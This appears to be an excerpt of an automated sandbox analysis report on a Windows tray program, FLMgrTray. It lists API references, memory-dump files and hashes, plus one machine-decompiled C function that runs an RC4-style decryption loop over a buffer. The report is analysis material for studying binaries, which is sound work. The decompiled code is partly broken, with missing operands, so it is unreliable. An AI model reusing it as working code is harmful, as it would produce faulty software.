                                                                                        0x0016432d
                                                                                        0x0016432d
                                                                                        0x0016432f
                                                                                        0x0016433a
                                                                                        0x00164344
                                                                                        0x0016431b
                                                                                        0x0016431b
                                                                                        0x0016431e
                                                                                        0x00164321
                                                                                        0x00164323
                                                                                        0x00164329
                                                                                        0x00164347
                                                                                        0x00000000
                                                                                        0x0016432b
                                                                                        0x0016432b
                                                                                        0x00000000
                                                                                        0x0016432b
                                                                                        0x00164329
                                                                                        0x00164319
                                                                                        0x001642ec
                                                                                        0x00164242
                                                                                        0x00164245
                                                                                        0x00164248
                                                                                        0x0016424d
                                                                                        0x0016424f
                                                                                        0x0016424f
                                                                                        0x00164251
                                                                                        0x0016425a
                                                                                        0x00164262
                                                                                        0x0016426e
                                                                                        0x0016426e

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(00000000,?,?,?,?,2C80D730,?,?,?,2C80D730,?,?,?,?,2C80D730), ref: 0016425A
                                                                                        • memcpy.VCRUNTIME140(00000000,?,2C80D730,00000001,?,2C80D730,?,2C80D730,?,2C80D730), ref: 001642F5
                                                                                        • memset.VCRUNTIME140(2C80D730,?,2C80D730,00000000,?,2C80D730,00000001,?,2C80D730,?,2C80D730,?,2C80D730), ref: 00164301
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,?,2C80D730,?,2C80D730,?,2C80D730), ref: 00164347
                                                                                        • memcpy.VCRUNTIME140(00000000,00000000,?,00000001,?,2C80D730,?,2C80D730,?,2C80D730), ref: 00164350
                                                                                        • memset.VCRUNTIME140(2C80D730,?,2C80D730,00000000,00000000,?,00000001,?,2C80D730,?,2C80D730,?,2C80D730), ref: 0016435C
                                                                                          • Part of subcall function 001631F0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000,?,?,00181718,?,2C80D730), ref: 001631F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy$Xlength_error@std@@_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 1409153418-0
                                                                                        • Opcode ID: 7db5d7b0e9df329054d21a02702096909a3227893d8842ee1e4a49abaacb98f8
                                                                                        • Instruction ID: 9cad752b8ddebe69bd0bb58b65ec465c27ecf72bd1acbc415c35ff806fa4f1a9
                                                                                        • Opcode Fuzzy Hash: 7db5d7b0e9df329054d21a02702096909a3227893d8842ee1e4a49abaacb98f8
                                                                                        • Instruction Fuzzy Hash: 7741B235A00114AFCB09DF6CDC909AEBBA9FF55310B20826AF969D7741D7309A60CBE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ?CreateTrayIcon@CTrayIcon@DuiLib@@QAEXPAUHWND__@@IPB_WI@Z.DUILIB(?,00000085,013C1BE0,00000000), ref: 00162F94
                                                                                        • RegisterWindowMessageW.USER32(?), ref: 001630FC
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0016310D
                                                                                        • SetWindowLongW.USER32 ref: 0016311E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Icon@LongTray$CreateD__@@Lib@@MessageRegister
                                                                                        • String ID: gUF]UYKyIY\JZ$A
                                                                                        • API String ID: 2116190904-3548969535
                                                                                        • Opcode ID: ef92a63be87a6af3935dc1fd5a84a3d1c929d5f32f5e8184ab785f6384420d2e
                                                                                        • Instruction ID: 05dc1bb62f9cdfdbb337252f996af1cd5a2195d4e369b4d8a508ba7880f308bb
                                                                                        • Opcode Fuzzy Hash: ef92a63be87a6af3935dc1fd5a84a3d1c929d5f32f5e8184ab785f6384420d2e
                                                                                        • Instruction Fuzzy Hash: F5419136D25B488BD7039B7898025D5F7B4AF6B685B14C32AF904B5A72FF30A6D28704
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ??0CDuiString@DuiLib@@QAE@PB_WH@Z.DUILIB(click,000000FF,2C80D730), ref: 00161038
                                                                                        • ??0CDuiString@DuiLib@@QAE@PB_WH@Z.DUILIB(0018FE18,000000FF), ref: 0016104D
                                                                                        • ??0CDuiString@DuiLib@@QAE@PB_WH@Z.DUILIB(0018FE18,000000FF,?,?,?,?,?,0018CB00,000000FF), ref: 00161093
                                                                                        • ??0CDuiString@DuiLib@@QAE@PB_WH@Z.DUILIB(0018FE18,000000FF,?,?,?,?,?,0018CB00,000000FF), ref: 001610A5
                                                                                          • Part of subcall function 001759A9: __onexit.LIBCMT ref: 001759AF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Lib@@String@$__onexit
                                                                                        • String ID: click
                                                                                        • API String ID: 2284767783-3136733728
                                                                                        • Opcode ID: 79496399a26c47fb1722991182a0e7785ece2ec1fca2b908929a3057b499da10
                                                                                        • Instruction ID: 9e2eddeed66ce0116b566010bbb09ddef484c5cc31bbd745b4839f3c56baf9d0
                                                                                        • Opcode Fuzzy Hash: 79496399a26c47fb1722991182a0e7785ece2ec1fca2b908929a3057b499da10
                                                                                        • Instruction Fuzzy Hash: A0218C71D086599ADB00AF98ED057AEBBB4EB05338F20432AE834777D1DBB516948BD0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 33%
                                                                                        			E00164640(intOrPtr* __ecx, void* __eflags, void* _a4, char _a7, void* _a8) {
                                                                                        				intOrPtr _v0;
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				void* _v16;
                                                                                        				void* _v20;
                                                                                        				void* _v24;
                                                                                        				void* _v28;
                                                                                        				int _v32;
                                                                                        				intOrPtr* _v36;
                                                                                        				void* __ebp;
                                                                                        				intOrPtr* _t104;
                                                                                        				void* _t105;
                                                                                        				signed int _t113;
                                                                                        				signed int _t116;
                                                                                        				intOrPtr _t117;
                                                                                        				void* _t145;
                                                                                        				void* _t146;
                                                                                        				intOrPtr _t148;
                                                                                        				void _t150;
                                                                                        				int _t151;
                                                                                        				void* _t152;
                                                                                        				signed int _t153;
                                                                                        				int _t157;
                                                                                        				intOrPtr _t160;
                                                                                        				int** _t162;
                                                                                        				void* _t163;
                                                                                        				intOrPtr _t164;
                                                                                        				void* _t166;
                                                                                        				intOrPtr* _t168;
                                                                                        				void* _t169;
                                                                                        				intOrPtr _t171;
                                                                                        				void* _t172;
                                                                                        				int* _t173;
                                                                                        				void* _t174;
                                                                                        				intOrPtr _t178;
                                                                                        				void* _t181;
                                                                                        				void* _t182;
                                                                                        				int* _t183;
                                                                                        				signed int _t185;
                                                                                        				char* _t186;
                                                                                        				void* _t187;
                                                                                        				int _t189;
                                                                                        				void* _t191;
                                                                                        				signed int _t192;
                                                                                        				void* _t197;
                                                                                        				void* _t198;
                                                                                        				void* _t199;
                                                                                        
                                                                                        				_t181 = _a4;
                                                                                        				_v36 = __ecx;
                                                                                        				_t104 =  *__ecx;
                                                                                        				_t151 =  *(_t181 + 0x10);
                                                                                        				_v32 = _t151;
                                                                                        				_v24 = _t104 + 8;
                                                                                        				_v8 =  *_t104;
                                                                                        				_t189 = _t151 + 1;
                                                                                        				_push(_t189);
                                                                                        				_v12 =  *((intOrPtr*)(_t104 + 4));
                                                                                        				_t105 = E001755E6();
                                                                                        				_v16 = _t105;
                                                                                        				memset(_t105, 0, _t189);
                                                                                        				_t157 =  *(_t181 + 0x10);
                                                                                        				_t198 = _t197 + 0x10;
                                                                                        				if( *((intOrPtr*)(_t181 + 0x14)) >= 0x10) {
                                                                                        					_t181 =  *_t181;
                                                                                        				}
                                                                                        				_t182 = _v16;
                                                                                        				memcpy(_t182, _t181, _t157);
                                                                                        				_t199 = _t198 + 0xc;
                                                                                        				_v20 = 0;
                                                                                        				if(_t151 <= 0) {
                                                                                        					L28:
                                                                                        					_t168 = _v36;
                                                                                        					_push(_t182);
                                                                                        					 *((intOrPtr*)( *_t168)) = _v8;
                                                                                        					 *((intOrPtr*)( *_t168 + 4)) = _v12;
                                                                                        					L001755EF();
                                                                                        					return 0;
                                                                                        				} else {
                                                                                        					_t152 = _a8;
                                                                                        					do {
                                                                                        						_t169 = _v24;
                                                                                        						_t113 = _v8 + 0x00000001 & 0x000000ff;
                                                                                        						_v8 = _t113;
                                                                                        						_t160 =  *((intOrPtr*)(_t169 + _t113 * 4));
                                                                                        						_t116 = _t160 + _v12 & 0x000000ff;
                                                                                        						_v12 = _t116;
                                                                                        						_t117 =  *((intOrPtr*)(_t169 + _t116 * 4));
                                                                                        						 *((intOrPtr*)(_t169 + _v8 * 4)) = _t117;
                                                                                        						_t191 = _v24;
                                                                                        						 *((intOrPtr*)(_t191 + _v12 * 4)) = _t160;
                                                                                        						_t171 = _v20;
                                                                                        						 *(_t171 + _t182) =  *(_t171 + _t182) ^  *(_t191 + (_t160 + _t117 & 0x000000ff) * 4) & 0x000000ff;
                                                                                        						_t162 =  *(_t152 + 0x10);
                                                                                        						_t172 =  *(_t152 + 0x14);
                                                                                        						_a7 =  *(_t171 + _t182);
                                                                                        						_a8 = _t162;
                                                                                        						_v28 = _t172;
                                                                                        						if(_t162 >= _t172) {
                                                                                        							if(0x7fffffff - _t162 < 1) {
                                                                                        								L30:
                                                                                        								E001631F0(_t172);
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("int3");
                                                                                        								asm("movaps xmm1, [0x18ffd0]");
                                                                                        								_push(_t152);
                                                                                        								_push(_t191);
                                                                                        								 *( *_t162) = 0;
                                                                                        								_push(_t182);
                                                                                        								( *_t162)[1] = 0;
                                                                                        								_t183 =  *_t162;
                                                                                        								_t163 = 8;
                                                                                        								_t173 =  &(_t183[0xa]);
                                                                                        								do {
                                                                                        									asm("movd xmm0, eax");
                                                                                        									_t173 =  &(_t173[0x10]);
                                                                                        									asm("pshufd xmm0, xmm0, 0x0");
                                                                                        									asm("paddd xmm0, xmm1");
                                                                                        									asm("movups [edx-0x60], xmm0");
                                                                                        									asm("movd xmm0, eax");
                                                                                        									asm("pshufd xmm0, xmm0, 0x0");
                                                                                        									asm("paddd xmm0, xmm1");
                                                                                        									asm("movups [edx-0x50], xmm0");
                                                                                        									asm("movd xmm0, ecx");
                                                                                        									_t163 = _t163 + 0x10;
                                                                                        									asm("pshufd xmm0, xmm0, 0x0");
                                                                                        									asm("paddd xmm0, xmm1");
                                                                                        									asm("movups [edx-0x40], xmm0");
                                                                                        									asm("movd xmm0, eax");
                                                                                        									_t86 = _t163 - 8; // -16
                                                                                        									asm("pshufd xmm0, xmm0, 0x0");
                                                                                        									asm("paddd xmm0, xmm1");
                                                                                        									asm("movups [edx-0x30], xmm0");
                                                                                        								} while (_t86 < 0x100);
                                                                                        								_t174 = 0;
                                                                                        								_t153 = 0;
                                                                                        								_t192 = 0;
                                                                                        								do {
                                                                                        									_t164 =  *((intOrPtr*)(_t183 + 8 + _t192 * 4));
                                                                                        									_t153 =  *((intOrPtr*)(_t174 + _v0)) + _t153 + _t164 & 0x000000ff;
                                                                                        									 *((intOrPtr*)(_t183 + 8 + _t192 * 4)) =  *((intOrPtr*)(_t183 + 8 + _t153 * 4));
                                                                                        									_t98 = _t174 + 1; // 0x1
                                                                                        									 *((intOrPtr*)(_t183 + 8 + _t153 * 4)) = _t164;
                                                                                        									_t192 = _t192 + 1;
                                                                                        									_t174 =  <  ? _t98 : 0;
                                                                                        								} while (_t192 < 0x100);
                                                                                        								return 0;
                                                                                        							} else {
                                                                                        								_t185 =  &(_t162[0]) | 0x0000000f;
                                                                                        								if(_t185 <= 0x7fffffff) {
                                                                                        									_t191 = _t172 >> 1;
                                                                                        									if(_t172 <= 0x7fffffff - _t191) {
                                                                                        										_t182 =  <  ? _t191 + _t172 : _t185;
                                                                                        									} else {
                                                                                        										_t182 = 0x7fffffff;
                                                                                        									}
                                                                                        								} else {
                                                                                        									_t182 = 0x7fffffff;
                                                                                        								}
                                                                                        								_t52 = _t182 + 1; // 0x80000000
                                                                                        								_t172 = _t52;
                                                                                        								if(_t172 < 0x1000) {
                                                                                        									if(_t172 == 0) {
                                                                                        										_t191 = 0;
                                                                                        									} else {
                                                                                        										_push(_t172);
                                                                                        										_t145 = E00175703();
                                                                                        										_t162 = _a8;
                                                                                        										_t199 = _t199 + 4;
                                                                                        										_t191 = _t145;
                                                                                        									}
                                                                                        									goto L20;
                                                                                        								} else {
                                                                                        									_t53 = _t172 + 0x23; // 0x80000023
                                                                                        									_t146 = _t53;
                                                                                        									_t162 = 0xffffffff;
                                                                                        									_t147 =  <=  ? 0xffffffff : _t146;
                                                                                        									_push( <=  ? 0xffffffff : _t146);
                                                                                        									_t148 = E00175703();
                                                                                        									_t199 = _t199 + 4;
                                                                                        									if(_t148 == 0) {
                                                                                        										L29:
                                                                                        										__imp___invalid_parameter_noinfo_noreturn();
                                                                                        										goto L30;
                                                                                        									} else {
                                                                                        										_t162 = _a8;
                                                                                        										_t55 = _t148 + 0x23; // 0x23
                                                                                        										_t191 = _t55 & 0xffffffe0;
                                                                                        										 *((intOrPtr*)(_t191 - 4)) = _t148;
                                                                                        										L20:
                                                                                        										 *(_t152 + 0x14) = _t182;
                                                                                        										_t186 = _t191 + _t162;
                                                                                        										 *(_t152 + 0x10) =  &(_t162[0]);
                                                                                        										_a8 = _t186;
                                                                                        										_push(_t162);
                                                                                        										if(_v28 < 0x10) {
                                                                                        											memcpy(_t191, _t152, ??);
                                                                                        											_t199 = _t199 + 0xc;
                                                                                        											 *_t186 = _a7;
                                                                                        											 *((char*)(_t186 + 1)) = 0;
                                                                                        											goto L26;
                                                                                        										} else {
                                                                                        											_t187 =  *_t152;
                                                                                        											memcpy(_t191, _t187, ??);
                                                                                        											_t143 = _a8;
                                                                                        											_t199 = _t199 + 0xc;
                                                                                        											_t166 = _v28 + 1;
                                                                                        											 *_t143 = _a7;
                                                                                        											 *((char*)(_t143 + 1)) = 0;
                                                                                        											if(_t166 < 0x1000) {
                                                                                        												L24:
                                                                                        												_push(_t166);
                                                                                        												E00175733(_t143, _t187);
                                                                                        												_t199 = _t199 + 8;
                                                                                        												L26:
                                                                                        												_t182 = _v16;
                                                                                        												 *_t152 = _t191;
                                                                                        												goto L27;
                                                                                        											} else {
                                                                                        												_t172 =  *(_t187 - 4);
                                                                                        												_t162 = _t166 + 0x23;
                                                                                        												_t182 = _t187 - _t172;
                                                                                        												_t143 = _t182 - 4;
                                                                                        												if(_t182 - 4 > 0x1f) {
                                                                                        													goto L29;
                                                                                        												} else {
                                                                                        													_t187 = _t172;
                                                                                        													goto L24;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        						} else {
                                                                                        							 *(_t152 + 0x10) =  &(_t162[0]);
                                                                                        							_t150 = _t152;
                                                                                        							if(_t172 >= 0x10) {
                                                                                        								_t150 =  *_t152;
                                                                                        							}
                                                                                        							 *((char*)(_t162 + _t150)) = _a7;
                                                                                        							 *((char*)(_t150 +  &(_t162[0]))) = 0;
                                                                                        							goto L27;
                                                                                        						}
                                                                                        						goto L36;
                                                                                        						L27:
                                                                                        						_t178 = _v20 + 1;
                                                                                        						_v20 = _t178;
                                                                                        					} while (_t178 < _v32);
                                                                                        					goto L28;
                                                                                        				}
                                                                                        				L36:
                                                                                        			}


















































                                                                                        0x0016464b
                                                                                        0x0016464e
                                                                                        0x00164651
                                                                                        0x00164653
                                                                                        0x00164656
                                                                                        0x0016465e
                                                                                        0x00164661
                                                                                        0x00164664
                                                                                        0x0016466a
                                                                                        0x0016466b
                                                                                        0x0016466e
                                                                                        0x00164677
                                                                                        0x0016467a
                                                                                        0x0016467f
                                                                                        0x00164682
                                                                                        0x00164689
                                                                                        0x0016468b
                                                                                        0x0016468b
                                                                                        0x0016468f
                                                                                        0x00164693
                                                                                        0x0016469a
                                                                                        0x0016469d
                                                                                        0x001646a2
                                                                                        0x00164832
                                                                                        0x00164832
                                                                                        0x00164838
                                                                                        0x0016483b
                                                                                        0x00164842
                                                                                        0x00164845
                                                                                        0x00164855
                                                                                        0x001646a8
                                                                                        0x001646a8
                                                                                        0x001646b0
                                                                                        0x001646b3
                                                                                        0x001646b8
                                                                                        0x001646bb
                                                                                        0x001646c1
                                                                                        0x001646c9
                                                                                        0x001646cc
                                                                                        0x001646cf
                                                                                        0x001646d2
                                                                                        0x001646d8
                                                                                        0x001646db
                                                                                        0x001646e0
                                                                                        0x001646ea
                                                                                        0x001646f0
                                                                                        0x001646f3
                                                                                        0x001646f6
                                                                                        0x001646f9
                                                                                        0x001646fc
                                                                                        0x00164701
                                                                                        0x0016472c
                                                                                        0x0016485e
                                                                                        0x0016485e
                                                                                        0x00164863
                                                                                        0x00164864
                                                                                        0x00164865
                                                                                        0x00164866
                                                                                        0x00164867
                                                                                        0x00164868
                                                                                        0x00164869
                                                                                        0x0016486a
                                                                                        0x0016486b
                                                                                        0x0016486c
                                                                                        0x0016486d
                                                                                        0x0016486e
                                                                                        0x0016486f
                                                                                        0x00164875
                                                                                        0x0016487c
                                                                                        0x0016487d
                                                                                        0x0016487e
                                                                                        0x00164886
                                                                                        0x00164887
                                                                                        0x0016488e
                                                                                        0x00164890
                                                                                        0x00164895
                                                                                        0x001648a0
                                                                                        0x001648a3
                                                                                        0x001648a7
                                                                                        0x001648aa
                                                                                        0x001648b2
                                                                                        0x001648b6
                                                                                        0x001648ba
                                                                                        0x001648c1
                                                                                        0x001648c6
                                                                                        0x001648ca
                                                                                        0x001648ce
                                                                                        0x001648d2
                                                                                        0x001648d5
                                                                                        0x001648da
                                                                                        0x001648de
                                                                                        0x001648e2
                                                                                        0x001648e6
                                                                                        0x001648e9
                                                                                        0x001648ee
                                                                                        0x001648f2
                                                                                        0x001648f6
                                                                                        0x001648fd
                                                                                        0x001648ff
                                                                                        0x00164901
                                                                                        0x00164903
                                                                                        0x00164906
                                                                                        0x00164911
                                                                                        0x00164918
                                                                                        0x0016491c
                                                                                        0x00164921
                                                                                        0x00164925
                                                                                        0x00164929
                                                                                        0x0016492c
                                                                                        0x0016493a
                                                                                        0x00164732
                                                                                        0x00164735
                                                                                        0x0016473e
                                                                                        0x0016474e
                                                                                        0x00164754
                                                                                        0x00164762
                                                                                        0x00164756
                                                                                        0x00164756
                                                                                        0x00164756
                                                                                        0x00164740
                                                                                        0x00164740
                                                                                        0x00164740
                                                                                        0x00164765
                                                                                        0x00164765
                                                                                        0x0016476e
                                                                                        0x0016479e
                                                                                        0x001647b0
                                                                                        0x001647a0
                                                                                        0x001647a0
                                                                                        0x001647a1
                                                                                        0x001647a6
                                                                                        0x001647a9
                                                                                        0x001647ac
                                                                                        0x001647ac
                                                                                        0x00000000
                                                                                        0x00164770
                                                                                        0x00164770
                                                                                        0x00164770
                                                                                        0x00164773
                                                                                        0x0016477a
                                                                                        0x0016477d
                                                                                        0x0016477e
                                                                                        0x00164783
                                                                                        0x00164788
                                                                                        0x00164858
                                                                                        0x00164858
                                                                                        0x00000000
                                                                                        0x0016478e
                                                                                        0x0016478e
                                                                                        0x00164791
                                                                                        0x00164794
                                                                                        0x00164797
                                                                                        0x001647b2
                                                                                        0x001647b9
                                                                                        0x001647bc
                                                                                        0x001647bf
                                                                                        0x001647c2
                                                                                        0x001647c5
                                                                                        0x001647c6
                                                                                        0x0016480c
                                                                                        0x00164814
                                                                                        0x00164817
                                                                                        0x00164819
                                                                                        0x00000000
                                                                                        0x001647c8
                                                                                        0x001647c8
                                                                                        0x001647cc
                                                                                        0x001647d1
                                                                                        0x001647d4
                                                                                        0x001647dd
                                                                                        0x001647de
                                                                                        0x001647e0
                                                                                        0x001647ea
                                                                                        0x001647fe
                                                                                        0x001647fe
                                                                                        0x00164800
                                                                                        0x00164805
                                                                                        0x0016481d
                                                                                        0x0016481d
                                                                                        0x00164820
                                                                                        0x00000000
                                                                                        0x001647ec
                                                                                        0x001647ec
                                                                                        0x001647ef
                                                                                        0x001647f2
                                                                                        0x001647f4
                                                                                        0x001647fa
                                                                                        0x00000000
                                                                                        0x001647fc
                                                                                        0x001647fc
                                                                                        0x00000000
                                                                                        0x001647fc
                                                                                        0x001647fa
                                                                                        0x001647ea
                                                                                        0x001647c6
                                                                                        0x00164788
                                                                                        0x0016476e
                                                                                        0x00164703
                                                                                        0x00164706
                                                                                        0x00164709
                                                                                        0x0016470e
                                                                                        0x00164710
                                                                                        0x00164710
                                                                                        0x00164715
                                                                                        0x00164718
                                                                                        0x00000000
                                                                                        0x00164718
                                                                                        0x00000000
                                                                                        0x00164822
                                                                                        0x00164825
                                                                                        0x00164826
                                                                                        0x00164829
                                                                                        0x00000000
                                                                                        0x001646b0
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 0016467A
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 00164693
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 001647CC
                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 0016480C
                                                                                          • Part of subcall function 00175703: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(2C80D730,?,00163245,2C80D730,?,string too long,0016353C,2C80D731,?,?,?,?,00176DD2,2C80D730,2C80D731,00000000), ref: 00175718
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00164858
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturnmallocmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1427913520-0
                                                                                        • Opcode ID: 3f5574287f6f64e310a983a905a0e1514fb1edb6ea4160ac1bdbc8866b1fbc65
                                                                                        • Instruction ID: 36d2e0d4b34a772ff28fba1d5539b4816fec3061853e7df68159ff29d6d47d2d
                                                                                        • Opcode Fuzzy Hash: 3f5574287f6f64e310a983a905a0e1514fb1edb6ea4160ac1bdbc8866b1fbc65
                                                                                        • Instruction Fuzzy Hash: 36711C75900245DFCB18CF68C8809AEBBF6FF8A310B1582A9D8659B352D730EA55CBD1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.VCRUNTIME140(?,00000000,00000400,2C80D730,00000000), ref: 0018181A
                                                                                        • __stdio_common_vsprintf_s.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,00000400,?,00000000,000000FF,?,2C80D730,00000000), ref: 00181841
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00181A8F
                                                                                        • OutputDebugStringA.KERNEL32(00000000,?,?,?), ref: 00181AB4
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 00181AE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$DebugOutputString__stdio_common_vsprintf_smemset
                                                                                        • String ID:
                                                                                        • API String ID: 2658353555-0
                                                                                        • Opcode ID: da34adcd2bd875004f14c327222dc00284a4f76d662e25d49d7af81f4fa63b2b
                                                                                        • Instruction ID: 2a50e5c1cc3d678d71775f35573df53d9838f8dc5a4e05732d558a8e8cca5c4d
                                                                                        • Opcode Fuzzy Hash: da34adcd2bd875004f14c327222dc00284a4f76d662e25d49d7af81f4fa63b2b
                                                                                        • Instruction Fuzzy Hash: 098138B6D116888BD7169B34CC427E9F7B9AF66344F40C3AAF504B2552FB3067C68B04
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 00169D56
                                                                                        • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000), ref: 00169D79
                                                                                          • Part of subcall function 001692B0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(2C80D730,00000000,00168233,?,?,-00000060,0018D099,000000FF,?,0016973B,00168233,00000001), ref: 001692DB
                                                                                          • Part of subcall function 001692B0: memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,-00000060,0018D099,000000FF,?,0016973B,00168233,00000001), ref: 0016935F
                                                                                          • Part of subcall function 00169140: ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,2C80D730,00000000,00168233,?,0000000A,00168233,00000001), ref: 00169198
                                                                                          • Part of subcall function 00169140: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,0000000A,00168233,00000001), ref: 001691DB
                                                                                          • Part of subcall function 00169140: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,0000000A,00168233,00000001), ref: 00169270
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000), ref: 00169E69
                                                                                        • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00169EB1
                                                                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00169EBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
